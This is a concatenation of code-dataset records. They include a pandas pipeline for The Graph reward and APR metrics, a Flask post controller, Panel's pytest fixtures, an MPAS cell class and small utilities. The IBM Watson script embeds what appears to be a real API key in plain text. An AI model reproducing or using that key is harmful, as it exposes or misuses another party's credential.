blocktimes...\")\n \n df_blocktimes = pd.DataFrame(data=blocktimes, columns=['block', 'blockTime'])\n \n df = df.merge(df_blocktimes, on='block')\n #df['blockDatetime'] = pd.to_datetime(df['blockTime'],unit='s')\n df['date'] = pd.to_datetime(df['blockTime'],unit='s').dt.date\n \n return df\n\ndef rename(df, type):\n \n return df.rename(columns = jobs.rename[type])\n\ndef aggregate(df, type):\n \n print(\"Aggregating dataframe...\")\n \n if type == 'global':\n pass\n \n elif type == 'subgraphs':\n \n df_names = df[['display_name', 'subgraph_id']].drop_duplicates().copy().reset_index(drop=True)\n \n df = (df.groupby(['subgraph_id','block','date', 'created_at'])\n .agg(\n {\n 'active' : 'max',\n 'curator_rewards_total': 'sum',\n 'delegator_rewards_total': 'sum',\n 'indexer_rewards_total': 'sum',\n 'price_per_share' : 'max',\n 'QF_total': 'sum',\n 'shares' : 'max',\n 'signal': 'sum',\n 'stake': 'sum'\n }\n )\n .reset_index()\n .copy())\n \n df = df.merge(df_names, on=['subgraph_id'])\n \n return df\n\n \ndef add_columns(df, type):\n \n print(\"Adding new columns...\")\n \n if type == 'allocations':\n df['subgraph_id'] = df.apply(lambda x: x['version_id'][:-2] if x['version_id'] else None, axis = 1)\n \n elif type == 'global':\n \n # Adding diffs\n df['QF'] = df['QF_total'].diff().fillna(0)\n \n df['signal_change'] = df['signal'].diff().fillna(0)\n df['signal_change_7d'] = df['signal'].diff(periods=7).fillna(0)\n df['signal_change_30d'] = df['signal'].diff(periods=30).fillna(0)\n \n df['stake_change'] = df['stake'].diff().fillna(0)\n df['stake_change_7d'] = df['stake'].diff(periods=7).fillna(0)\n df['stake_change_30d'] = df['stake'].diff(periods=30).fillna(0)\n \n df['allocation_change'] = df['allocation'].diff().fillna(0)\n df['allocation_change_7d'] = df['allocation'].diff(periods=7).fillna(0)\n df['allocation_change_30d'] = df['allocation'].diff(periods=30).fillna(0)\n \n df['delegation_change'] = df['delegation'].diff().fillna(0)\n df['delegation_change_7d'] = df['delegation'].diff(periods=7).fillna(0)\n df['delegation_change_30d'] = df['delegation'].diff(periods=30).fillna(0)\n \n df['curator_rewards'] = df['curator_rewards_total'].diff().fillna(0)\n df['indexer_rewards'] = df['indexer_rewards_total'].diff().fillna(0)\n df['delegator_rewards'] = df['delegator_rewards_total'].diff().fillna(0)\n \n # Adding moving sums and averages (remember to sort!)\n df = df.sort_values(['date'], ascending=True).reset_index()\n \n df['QF_7d'] = df['QF'].rolling(7).sum()\n df['QF_30d'] = df['QF'].rolling(30).sum()\n df['curator_rewards_7d'] = df['curator_rewards'].rolling(7).sum()\n df['curator_rewards_30d'] = df['curator_rewards'].rolling(30).sum()\n df['indexer_rewards_7d'] = df['indexer_rewards'].rolling(7).sum()\n df['indexer_rewards_30d'] = df['indexer_rewards'].rolling(30).sum()\n df['delegator_rewards_7d'] = df['delegator_rewards'].rolling(7).sum()\n df['delegator_rewards_30d'] = df['delegator_rewards'].rolling(30).sum()\n \n # Arithmetic\n df['signal_per_stake'] = df['signal'] / df['allocation']\n df['QF30D_per_signal'] = df['QF_30d'] / df['signal']\n \n # APR estimates \n df_feesplit = pd.read_csv('outputs/allocations.csv')\n feesplit = df_feesplit['delegation_fees'].sum()/df_feesplit['QF_collected'].sum()\n \n df['curator_apr_30d_estimate'] = (df['curator_rewards_30d'] / df['signal'].rolling(30).mean()) * 12\n df['indexer_apr_30d_estimate'] = ((df['indexer_rewards_30d'] + (1-feesplit)* df['QF_30d']) / df['stake'].rolling(30).mean()) * 12\n df['delegator_apr_30d_estimate'] = ((df['delegator_rewards_30d'] + feesplit* df['QF_30d'])/ df['delegation'].rolling(30).mean()) * 12\n \n if type == 'subgraphs':\n \n df = df.sort_values(['subgraph_id', 'block'])\n \n # Adding diffs per subgraph per block interval\n\n df['QF'] = df.groupby('subgraph_id')['QF_total'].diff().fillna(0)\n df['signal_change'] = df.groupby('subgraph_id')['signal'].diff().fillna(0)\n df['stake_change'] = df.groupby('subgraph_id')['stake'].diff().fillna(0)\n df['shares_change'] = df.groupby('subgraph_id')['shares'].diff().fillna(0)\n df['price_change'] = df.groupby('subgraph_id')['price_per_share'].diff().fillna(0)\n df['curator_rewards'] = df.groupby('subgraph_id')['curator_rewards_total'].diff().fillna(0)\n df['indexer_rewards'] = df.groupby('subgraph_id')['indexer_rewards_total'].diff().fillna(0)\n df['delegator_rewards'] = df.groupby('subgraph_id')['delegator_rewards_total'].diff().fillna(0)\n \n # Rolling means and sums\n df['QF_7d'] = df.groupby('subgraph_id').rolling(7)['QF'].sum().reset_index(drop=True)\n df['QF_14d'] = df.groupby('subgraph_id').rolling(14)['QF'].sum().reset_index(drop=True)\n df['QF_30d'] = df.groupby('subgraph_id').rolling(30)['QF'].sum().reset_index(drop=True)\n \n df['signal_change_7d'] = df.groupby('subgraph_id').rolling(7)['signal_change'].sum().reset_index(drop=True)\n df['signal_change_14d'] = df.groupby('subgraph_id').rolling(14)['signal_change'].sum().reset_index(drop=True)\n df['signal_change_30d'] = df.groupby('subgraph_id').rolling(30)['signal_change'].sum().reset_index(drop=True)\n \n df['signal_7d_MA'] = df.groupby('subgraph_id').rolling(7)['signal'].mean().reset_index(drop=True)\n df['signal_14d_MA'] = df.groupby('subgraph_id').rolling(14)['signal'].mean().reset_index(drop=True)\n df['signal_30d_MA'] = df.groupby('subgraph_id').rolling(30)['signal'].mean().reset_index(drop=True)\n \n df['stake_change_7d'] = df.groupby('subgraph_id').rolling(7)['stake_change'].sum().reset_index(drop=True)\n df['stake_change_14d'] = df.groupby('subgraph_id').rolling(14)['stake_change'].sum().reset_index(drop=True)\n df['stake_change_30d'] = df.groupby('subgraph_id').rolling(30)['stake_change'].sum().reset_index(drop=True)\n \n df['stake_7d_MA'] = df.groupby('subgraph_id').rolling(7)['stake'].mean().reset_index(drop=True)\n df['stake_14d_MA'] = df.groupby('subgraph_id').rolling(14)['stake'].mean().reset_index(drop=True)\n df['stake_30d_MA'] = df.groupby('subgraph_id').rolling(30)['stake'].mean().reset_index(drop=True)\n \n df['shares_change_7d'] = df.groupby('subgraph_id').rolling(7)['shares_change'].sum().reset_index(drop=True)\n df['shares_change_14d'] = df.groupby('subgraph_id').rolling(14)['shares_change'].sum().reset_index(drop=True)\n df['shares_change_30d'] = df.groupby('subgraph_id').rolling(30)['shares_change'].sum().reset_index(drop=True)\n \n df['shares_7d_MA'] = df.groupby('subgraph_id').rolling(7)['shares'].mean().reset_index(drop=True)\n df['shares_14d_MA'] = df.groupby('subgraph_id').rolling(14)['shares'].mean().reset_index(drop=True)\n df['shares_30d_MA'] = df.groupby('subgraph_id').rolling(30)['shares'].mean().reset_index(drop=True)\n \n df['price_change_7d'] = df.groupby('subgraph_id').rolling(7)['price_change'].sum().reset_index(drop=True)\n df['price_change_14d'] = df.groupby('subgraph_id').rolling(14)['price_change'].sum().reset_index(drop=True)\n df['price_change_30d'] = df.groupby('subgraph_id').rolling(30)['price_change'].sum().reset_index(drop=True)\n \n df['price_7d_MA'] = df.groupby('subgraph_id').rolling(7)['price_per_share'].mean().reset_index(drop=True)\n df['price_14d_MA'] = df.groupby('subgraph_id').rolling(14)['price_per_share'].mean().reset_index(drop=True)\n df['price_30d_MA'] = df.groupby('subgraph_id').rolling(30)['price_per_share'].mean().reset_index(drop=True)\n \n df['curator_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['curator_rewards'].sum().reset_index(drop=True)\n df['curator_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['curator_rewards'].sum().reset_index(drop=True)\n df['curator_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['curator_rewards'].sum().reset_index(drop=True)\n \n df['indexer_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['indexer_rewards'].sum().reset_index(drop=True)\n df['indexer_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['indexer_rewards'].sum().reset_index(drop=True)\n df['indexer_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['indexer_rewards'].sum().reset_index(drop=True)\n \n df['delegator_rewards_7d'] = df.groupby('subgraph_id').rolling(7)['delegator_rewards'].sum().reset_index(drop=True)\n df['delegator_rewards_14d'] = df.groupby('subgraph_id').rolling(14)['delegator_rewards'].sum().reset_index(drop=True)\n df['delegator_rewards_30d'] = df.groupby('subgraph_id').rolling(30)['delegator_rewards'].sum().reset_index(drop=True)\n \n # Rates\n \n df['signal_per_stake'] = df['signal'] / df['stake']\n \n df['curator_rewards_per_signal_7d'] = df['curator_rewards_7d'] / df['signal_7d_MA']\n df['curator_rewards_per_signal_14d'] = df['curator_rewards_14d'] / df['signal_14d_MA']\n df['curator_rewards_per_signal_30d'] = df['curator_rewards_30d'] / df['signal_30d_MA']\n \n df['indexer_rewards_per_stake_7d'] = df['indexer_rewards_7d'] / df['stake_7d_MA']\n df['indexer_rewards_per_stake_14d'] = df['indexer_rewards_14d'] / df['stake_14d_MA']\n df['indexer_rewards_per_stake_30d'] = df['indexer_rewards_30d'] / df['stake_30d_MA']\n \n df['curator_apr_30d_estimate'] = df['curator_rewards_per_signal_30d'] * 12\n \n # Estimating indexer/delegator fee splits\n df_feesplit = pd.read_csv('outputs/allocations.csv')\n feesplit = df_feesplit['delegation_fees'].sum()/df_feesplit['QF_collected'].sum()\n \n df['indexer_apr_30d_estimate'] = (df['QF_30d'] * (1-feesplit) + df['indexer_rewards_30d']) / df['stake_30d_MA'] * 12\n \n df['price_growth_7d'] = -df['price_per_share'] / (df['price_change_7d'] - df['price_per_share']) - 1\n df['price_growth_14d'] = -df['price_per_share'] / (df['price_change_14d'] - df['price_per_share']) - 1\n df['price_growth_30d'] = -df['price_per_share'] / (df['price_change_30d'] - df['price_per_share']) - 1\n \n df['curator_rewards_per_share_30d'] = df['curator_rewards_30d'] / df['shares_30d_MA']\n #df['curator_rewards_per_share_squared_30d'] = df['curator_rewards_30d'] / (df['shares_30d_MA']*df['shares_30d_MA'])\n #df['price_per_reward_30d'] = df['price_per_share'] / df['curator_rewards_per_share_30d']\n \n \n df = df.replace([np.inf, -np.inf], np.nan)\n \n return df\n\ndef drop_rows(df, type):\n \n if type == 'allocations':\n \n #Drop all rows where closed_block is outside of the block interval\n df = df.loc[(df['closed_at_block'] >= df['block'].min()) & (df['closed_at_block'] <= df['block'].max())]\n \n return df\n \n\ndef pipeline(raw, blocktimes, job):\n \n if job.type == 'allocations':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_columns(df, job.type)\n df = drop_rows(df, job.type)\n \n elif job.type == 'global':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_blocktimes(df, blocktimes)\n df = add_columns(df, job.type)\n \n elif job.type == 'subgraphs':\n df = get_df(raw, job.type)\n df = clean_names(df, job.query)\n df = clean_data(df, job.query)\n df = add_blocktimes(df, blocktimes)\n \n df = aggregate(df, job.type)\n df = add_columns(df, job.type)\n #print(df.columns)\n #return None\n \n print(\"Saving local file...\")\n \n if job.type == 'allocations':\n \n #filedate = pytz.utc.localize(datetime.datetime.utcnow()).date().strftime('%m_%d_%Y')\n filename = f\"{job.filename}.csv\"\n df.to_csv(f'{job.output}/{filename}', columns=jobs.columns_out[job.type])\n \n else:\n filedate = df['date'].max().strftime('%m_%d_%Y')\n filename = f\"{job.filename}_{filedate}.csv\"\n\n (\n df\n .sort_values('date', ascending=True)\n .tail(job.rows).reset_index(drop=True)\n .to_csv(f'{job.output}/{filename}', columns=jobs.columns_out[job.type])\n )\n \n return filename, df","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":15899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241890210","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session, flash\nfrom flask_app.models.model_poke import Poke\nfrom flask_app.models.model_user import User\n\n@app.route('/post/new')\ndef post_new():\n context = {\n 'user' : User.get_one(session['uuid'])[0]\n }\n return render_template('new_post.html', **context)\n\n@app.route('/post/create', methods=['POST'])\ndef post_create():\n is_valid = Poke.validate_post(request.form)\n if not is_valid:\n return redirect('/post/create')\n info = {\n **request.form,\n 'user_id' : session['uuid']\n }\n Poke.create(info)\n return redirect('/')\n\n@app.route('/post/<int:post_id>/delete')\ndef post_delete(post_id):\n post = Poke.get_one(post_id)\n if post['users_id'] == session['uuid']:\n Poke.delete_one(post_id)\n return redirect('/')\n\n@app.route('/post/<int:post_id>/edit')\ndef edit_post(post_id):\n post_id = Poke.get_one(post_id)\n context = {\n \"post\" : post_id,\n \"user\" : session['uuid']\n }\n return render_template('edit_post.html', **context)\n\n@app.route('/post/<int:post_id>/update', methods=['POST'])\ndef update_post(post_id):\n is_valid = Poke.validate_post(request.form)\n if not is_valid:\n return redirect('/post/<int:post_id>/edit')\n info = {\n \"location\": request.form['location'],\n \"date\": request.form['date'],\n \"content\": request.form['content'],\n \"num_of_sas\": request.form['num_of_sas'],\n \"id\" : post_id\n }\n Poke.update_one(info)\n url = f'/post/{post_id}/edit'\n return redirect(url)\n\n@app.route('/post/<int:post_id>/view')\ndef view_post(post_id):\n post_id = Poke.get_one(post_id)\n user_name = Poke.get_name_by_post(post_id['users_id'])[0]\n context = { \n \"post\" : post_id,\n \"user_name\" : user_name\n }\n return render_template('view_post.html', **context)","sub_path":"flask_app/controllers/controller_poke.py","file_name":"controller_poke.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628620810","text":"\"\"\"\nMake sure settings.yaml is valid yaml\n\"\"\"\n\nimport os\nimport yaml\n\n\ndef test_valid_syntax():\n \"\"\"Actually check the yaml file\"\"\"\n fname = os.path.join(\n os.path.dirname(os.path.dirname(__file__)),\n 'settings.yaml'\n )\n\n with open(fname) as conf:\n yaml.load(conf)\n","sub_path":"make-release/tests/test_makereleaseyaml.py","file_name":"test_makereleaseyaml.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396223279","text":"import json\nfrom watson_developer_cloud import VisualRecognitionV3\n\nfrom watson_developer_cloud import VisualRecognitionV3\n\nvisual_recognition = VisualRecognitionV3(\n '2018-03-04',\n api_key='f8d4b7808571deb16cbd5e74ba6e446a1922a959'\n)\n\n\nwith open('./hqdefault.jpg', 'rb') as images_file:\n classes = visual_recognition.classify(\n images_file,\n parameters=json.dumps({\n\n }))\nprint(json.dumps(classes, indent=2))\n","sub_path":"watsonclass.py","file_name":"watsonclass.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466086576","text":"\n\nimport json\nfrom json import JSONEncoder\nimport numpy as np\nfrom pyflowline.classes.vertex import pyvertex\nfrom pyflowline.classes.edge import pyedge\nfrom pyflowline.classes.cell import pycell\nfrom pyflowline.classes.flowline import pyflowline\nfrom pyflowline.external.pyearth.gis.gdal.gdal_functions import calculate_polygon_area\n\nclass MpasClassEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n if isinstance(obj, np.float32):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n if isinstance(obj, list):\n pass \n if isinstance(obj, pyvertex):\n return json.loads(obj.tojson()) #lVertexID\n if isinstance(obj, pyedge):\n return obj.lEdgeID \n if isinstance(obj, pyflowline):\n return obj.lFlowlineID\n \n if isinstance(obj, pympas):\n return obj.lCellID\n \n return JSONEncoder.default(self, obj)\n\n\n\nclass pympas(pycell):\n \"\"\"\n The MPAS cell class\n\n Args:\n pycell (object): None\n\n Returns:\n pympas: A mpas cell object\n \"\"\"\n lCellID = -1 \n nFlowline=0\n nVertex =0 \n nEdge=0\n dLength=0.0\n dArea=0.0\n dX_center_meter=0.0\n dY_center_meter=0.0\n dz_center=0.0\n dLongitude_center_degree=0.0\n dLatitude_center_degree=0.0\n dElevation_mean=0.0\n dElevation_profile0=0.0\n dLength_flowline=0.0\n iFlag_intersected=-1\n iFlag_coast = 0\n lCellID_downstream_burned=-1\n iStream_order_burned=-1\n iStream_segment_burned=-1\n aEdge=None\n aEdgeID=None\n aVertex=None\n aVertexID=None\n pVertex_center = None\n aFlowline=None \n nNeighbor=-1 \n nNeighbor_land=-1\n nNeighbor_land_virtual = -1\n aNeighbor_land_virtual = None\n nNeighbor_ocean=-1\n aNeighbor=None #the global ID of all neighbors, execluding null\n aNeighbor_land=None #the global ID of all neighbors\n \n aNeighbor_ocean=None #the global ID of all neighbors\n aNeighbor_distance = None\n \n\n def __init__(self, dLon, dLat, aEdge, aVertex):\n \"\"\"\n Initilize a mpas cell object\n\n Args:\n dLon (float): The longitude of center \n dLat (float): The latitude of center \n aEdge (list [pyedge]): A list of edges that define the hexagon\n aVertex (list [pyvertex]): A list of vertices the define the hexagon\n \"\"\"\n\n nEdge = len(aEdge)\n if nEdge < 3 or nEdge > 9:\n print('At lease 3 edges are required!', nEdge)\n pass\n else: \n self.aEdge = aEdge\n self.aVertex = aVertex #the first one and last one are the same\n self.nEdge = len(aEdge)\n self.nVertex = len(aVertex) \n #initialize the neighbor but without the actual neighbor information\n self.nNeighbor = -1\n self.nNeighbor_land = -1\n self.nNeighbor_land_virtual = -1\n self.nNeighbor_ocean = -1\n self.iFlag_coast = 0 \n self.dLongitude_center_degree = dLon\n self.dLatitude_center_degree = dLat\n pVertex = dict() \n pVertex['dLongitude_degree'] =self.dLongitude_center_degree\n pVertex['dLatitude_degree'] =self.dLatitude_center_degree \n self.pVertex_center = pyvertex(pVertex)\n self.lCellID_downstream_burned=-1\n self.iStream_order_burned=-1\n self.iStream_segment_burned=-1\n self.dElevation_mean=-9999.0\n self.dElevation_profile0=-9999.0\n pass\n pass\n \n \n def has_this_edge(self, pEdge_in):\n \"\"\"\n Check whether the cell contains an edge\n\n Args:\n pEdge_in (pyedge): the to be checked edge\n\n Returns:\n int: 1 if contains; or else 0\n \"\"\"\n iFlag_found = 0\n for pEdge in self.aEdge:\n if pEdge.is_overlap(pEdge_in):\n iFlag_found =1 \n break\n else:\n pass \n \n return iFlag_found\n\n def which_edge_cross_this_vertex(self, pVertex_in):\n \"\"\"\n When a flowline intersects with a cell, this function finds out which edge is intersected\n\n Args:\n pVertex_in (pyvertex): the intersected vertex\n\n Returns:\n tuple: (1, edge) if contains; or else (0, None) \n \"\"\"\n iFlag_found = 0\n pEdge_out = None\n for pEdge in self.aEdge:\n iFlag, dummy ,diff = pEdge.check_vertex_on_edge(pVertex_in)\n if( iFlag ==1 ):\n iFlag_found =1\n pEdge_out = pEdge\n break\n else:\n pass\n\n return iFlag_found, pEdge_out\n \n def calculate_cell_area(self):\n \"\"\"\n Calculate the area of a cell, this function is not used for mpas cell\n\n Returns:\n float: cell area\n \"\"\"\n lons=list()\n lats=list() \n for i in range(self.nVertex): \n lons.append( self.aVertex[i].dLongitude_degree )\n lats.append( self.aVertex[i].dLatitude_degree )\n\n self.dArea = calculate_polygon_area(lons,lats )\n return self.dArea\n\n def calculate_edge_length(self):\n \"\"\"\n Calculate the effective cell length/resolution\n\n Returns:\n float: effective cell length/resolution\n \"\"\"\n self.dLength_edge = np.sqrt( self.dArea )\n return self.dLength_edge\n \n def share_edge(self, other):\n \"\"\"\n Check if two cells share an edge\n\n Args:\n other (pympas): the other cell\n\n Returns:\n int: 1 if shared, 0 if not\n \"\"\"\n iFlag_share = 0\n for pEdge in self.aEdge:\n for pEdge2 in other.aEdge:\n if pEdge.is_overlap(pEdge2) ==1 :\n iFlag_share = 1 \n break\n\n return iFlag_share\n\n \n def tojson(self):\n \"\"\"\n Convert a cell into a json string\n\n Returns:\n json str: A json string\n \"\"\"\n aSkip = ['aEdge', \\\n 'aFlowline']\n obj = self.__dict__.copy()\n for sKey in aSkip:\n obj.pop(sKey, None)\n sJson = json.dumps(obj, \\\n sort_keys=True, \\\n indent = 4, \\\n ensure_ascii=True, \\\n cls=MpasClassEncoder)\n return sJson\n","sub_path":"pyflowline/classes/mpas.py","file_name":"mpas.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170399716","text":"def longestPalSubstr(string): \r\n\r\n maxLength = 1; start = 0; length = len(string) \r\n low = 0; high = 0 \r\n\r\n # One by one consider every character as center point of even length palindromes \r\n\r\n for i in range(1, length): \r\n\r\n # Find the longest even length palindrome with center points as i-1 and i. \r\n\r\n low = i - 1 \r\n high = i \r\n\r\n while low >= 0 and high < length and string[low] == string[high]: \r\n\r\n if high - low + 1 > maxLength: \r\n\r\n start = low \r\n\r\n maxLength = high - low + 1 \r\n\r\n low -= 1 \r\n high += 1 \r\n\r\n # Find the longest odd length palindrome with center point as i \r\n\r\n low = i - 1 \r\n high = i + 1 \r\n\r\n while low >= 0 and high < length and string[low] == string[high]: \r\n\r\n if high - low + 1 > maxLength: \r\n\r\n start = low \r\n\r\n maxLength = high - low + 1 \r\n\r\n low -= 1 \r\n high += 1 \r\n \r\n\r\n print (string[start:start + maxLength]) \r\n\r\n return maxLength\r\n\r\nstring = 'babbad'\r\nlongestPalSubstr(string)\r\n","sub_path":"string_LongestPalidrome.py","file_name":"string_LongestPalidrome.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"287137010","text":"#!/usr/bin/env python3\nfrom serialize import to_json\n\n\n################################################\n### Testing objects\n\nclass Date(object):\n '''A date for a person'''\n def __init__(self, year, month, day):\n self.year = year\n self.month = month\n self.day = day\n\n\nclass Franchise(object):\n '''A franchise.'''\n def __init__(self, name, owner, started):\n self.name = name\n self.owner = owner\n self.started = started\n\n\nclass Person(object):\n '''A person'''\n def __init__(self, name, gender, birth_date, is_cool, net_worth, debut_year, father, mother, franchise):\n self.name = name\n self.gender = gender\n self.birth_date = birth_date\n self.is_cool = is_cool\n self.net_worth = net_worth\n self.debut_year = debut_year\n self.father = father\n self.mother = mother\n self.franchise = franchise\n\n\n\n################################################\n### Main method\n\nif __name__ == '__main__':\n # person 1\n fd1 = Date(1962, 8, 1)\n f1 = Franchise('Spiderman', 'Marvel', fd1)\n b1 = Date(2011, 2, 3)\n p1 = Person('Peter \"Spidey\" Parker', 'M', b1, False, 15000.00, 1967, None, None, f1)\n\n # person 2\n fd2 = Date(1962, 8, 1)\n f2 = Franchise('Superman', 'DC\\\\Comics', fd2)\n b2 = Date(2014, 5, 6)\n p2 = Person('Lois Lane', 'F', b2, True, 40000.50, 1981, None, None, f2)\n\n # person 3\n fd3 = Date(1963, 1, 1)\n f3 = Franchise('Doctor Who', 'BBC', fd3)\n b3 = Date(2017, 8, 9)\n p3 = Person('River Song/Melody Pond', 'F', b3, True, 91234.56, 2001, p1, p2, f3)\n\n # print\n to_json(p3)\n # print(to_json(p3))\n","sub_path":"reflection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546085996","text":"\"\"\"\nA module containing testing utilities and fixtures.\n\"\"\"\nimport os\nimport re\nimport shutil\nimport signal\nimport tempfile\nimport time\n\nfrom contextlib import contextmanager\nfrom subprocess import PIPE, Popen\n\nimport pytest\n\nfrom bokeh.client import pull_session\nfrom bokeh.document import Document\nfrom bokeh.model import Model\nfrom pyviz_comms import Comm\n\nfrom panel import config, serve\nfrom panel.config import panel_extension\nfrom panel.io import state\nfrom panel.pane import HTML, Markdown\n\n\ndef pytest_addoption(parser):\n parser.addoption('--ui', action='store_true', dest=\"ui\",\n default=False, help=\"enable UI tests\")\n\ndef pytest_configure(config):\n config.addinivalue_line(\n \"markers\", \"ui: mark as UI test\"\n )\n if config.option.ui:\n if getattr(config.option, 'markexpr', None):\n config.option.markexpr += ' and not ui'\n else:\n setattr(config.option, 'markexpr', 'ui')\n else:\n setattr(config.option, 'markexpr', 'not ui')\n\n@pytest.fixture\ndef context(context):\n # Set the default timeout to 20 secs\n context.set_default_timeout(20_000)\n yield context\n\nPORT = [6000]\n\n@pytest.fixture\ndef document():\n return Document()\n\n\n@pytest.fixture\ndef comm():\n return Comm()\n\n\n@pytest.fixture\ndef port():\n PORT[0] += 1\n return PORT[0]\n\n\n@pytest.fixture\ndef dataframe():\n import pandas as pd\n return pd.DataFrame({\n 'int': [1, 2, 3],\n 'float': [3.14, 6.28, 9.42],\n 'str': ['A', 'B', 'C']\n }, index=[1, 2, 3], columns=['int', 'float', 'str'])\n\n\n@pytest.fixture\ndef hv_bokeh():\n import holoviews as hv\n hv.renderer('bokeh')\n prev_backend = hv.Store.current_backend\n hv.Store.current_backend = 'bokeh'\n yield\n hv.Store.current_backend = prev_backend\n\n\n@pytest.fixture\ndef get_display_handle():\n cleanup = []\n def display_handle(model):\n cleanup.append(model.ref['id'])\n handle = {}\n state._handles[model.ref['id']] = (handle, [])\n return handle\n yield display_handle\n for ref in cleanup:\n if ref in state._handles:\n del state._handles[ref]\n\n\n@pytest.fixture\ndef hv_mpl():\n import holoviews as hv\n hv.renderer('matplotlib')\n prev_backend = hv.Store.current_backend\n hv.Store.current_backend = 'matplotlib'\n yield\n hv.Store.current_backend = prev_backend\n\n\n@pytest.fixture\ndef tmpdir(request, tmpdir_factory):\n name = request.node.name\n name = re.sub(r\"[\\W]\", \"_\", name)\n MAXVAL = 30\n if len(name) > MAXVAL:\n name = name[:MAXVAL]\n tmp_dir = tmpdir_factory.mktemp(name, numbered=True)\n yield tmp_dir\n shutil.rmtree(str(tmp_dir))\n\n\n@pytest.fixture()\ndef html_server_session():\n html = HTML('<h1>Title</h1>')\n server = serve(html, port=6000, show=False, start=False)\n session = pull_session(\n session_id='Test',\n url=\"http://localhost:{:d}/\".format(server.port),\n io_loop=server.io_loop\n )\n yield html, server, session\n try:\n server.stop()\n except AssertionError:\n pass # tests may already close this\n\n\n@pytest.fixture()\ndef markdown_server_session():\n html = Markdown('#Title')\n server = serve(html, port=6001, show=False, start=False)\n session = pull_session(\n session_id='Test',\n url=\"http://localhost:{:d}/\".format(server.port),\n io_loop=server.io_loop\n )\n yield html, server, session\n try:\n server.stop()\n except AssertionError:\n pass # tests may already close this\n\n\n@pytest.fixture\ndef multiple_apps_server_sessions():\n \"\"\"Serve multiple apps and yield a factory to allow\n parameterizing the slugs and the titles.\"\"\"\n servers = []\n def create_sessions(slugs, titles):\n app1_slug, app2_slug = slugs\n apps = {\n app1_slug: Markdown('First app'),\n app2_slug: Markdown('Second app')\n }\n server = serve(apps, port=5008, title=titles, show=False, start=False)\n servers.append(server)\n session1 = pull_session(\n url=f\"http://localhost:{server.port:d}/app1\",\n io_loop=server.io_loop\n )\n session2 = pull_session(\n url=f\"http://localhost:{server.port:d}/app2\",\n io_loop=server.io_loop\n )\n return session1, session2\n yield create_sessions\n for server in servers:\n try:\n server.stop()\n except AssertionError:\n continue # tests may already close this\n\n\n@pytest.fixture\ndef with_curdoc():\n old_curdoc = state.curdoc\n state.curdoc = Document()\n try:\n yield\n finally:\n state.curdoc = old_curdoc\n\n\n@contextmanager\ndef set_env_var(env_var, value):\n old_value = os.environ.get(env_var)\n os.environ[env_var] = value\n yield\n if old_value is None:\n del os.environ[env_var]\n else:\n os.environ[env_var] = old_value\n\n\n@pytest.fixture(autouse=True)\ndef module_cleanup():\n \"\"\"\n Cleanup Panel extensions after each test.\n \"\"\"\n to_reset = list(panel_extension._imports.values())\n Model.model_class_reverse_map = {\n name: model for name, model in Model.model_class_reverse_map.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }\n\n\n@pytest.fixture(autouse=True)\ndef server_cleanup():\n \"\"\"\n Clean up server state after each test.\n \"\"\"\n try:\n yield\n finally:\n state.kill_all_servers()\n state._indicators.clear()\n state._locations.clear()\n state._curdoc = None\n state.cache.clear()\n state._scheduled.clear()\n if state._thread_pool is not None:\n state._thread_pool.shutdown(wait=False)\n state._thread_pool = None\n\n@pytest.fixture(autouse=True)\ndef cache_cleanup():\n state.clear_caches()\n\n@pytest.fixture\ndef py_file():\n tf = tempfile.NamedTemporaryFile(mode='w', suffix='.py')\n try:\n yield tf\n finally:\n tf.close()\n\n\n@pytest.fixture\ndef threads():\n config.nthreads = 4\n try:\n yield 4\n finally:\n config.nthreads = None\n\n@pytest.fixture\ndef change_test_dir(request):\n os.chdir(request.fspath.dirname)\n yield\n os.chdir(request.config.invocation_dir)\n\n@pytest.fixture\ndef jupyter_server(port, change_test_dir, timeout=15):\n args = ['jupyter', 'server', '--port', str(port), \"--NotebookApp.token=''\"]\n process = Popen(args, stdout=PIPE, stderr=PIPE, bufsize=1, encoding='utf-8')\n os.set_blocking(process.stderr.fileno(), False)\n deadline = time.monotonic() + timeout\n while True:\n line = process.stderr.readline()\n time.sleep(0.02)\n if \"http://127.0.0.1:\" in line:\n host = \"http://127.0.0.1:\"\n break\n if \"http://localhost:\" in line:\n host = \"http://localhost:\"\n break\n if time.monotonic() > deadline:\n raise TimeoutError(\n 'jupyter server did not start within {timeout} seconds.'\n )\n port = int(line.split(host)[-1][:4])\n PORT[0] = port\n time.sleep(2)\n yield f\"http://localhost:{port}\"\n os.kill(process.pid, signal.SIGTERM)\n","sub_path":"panel/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558461478","text":"import requests\nimport sys\n\nif (len(sys.argv) < 2):\n print(\"Please supply a valid Developer Token as the first positional argument to this python script. You can create one by following the instructions here: 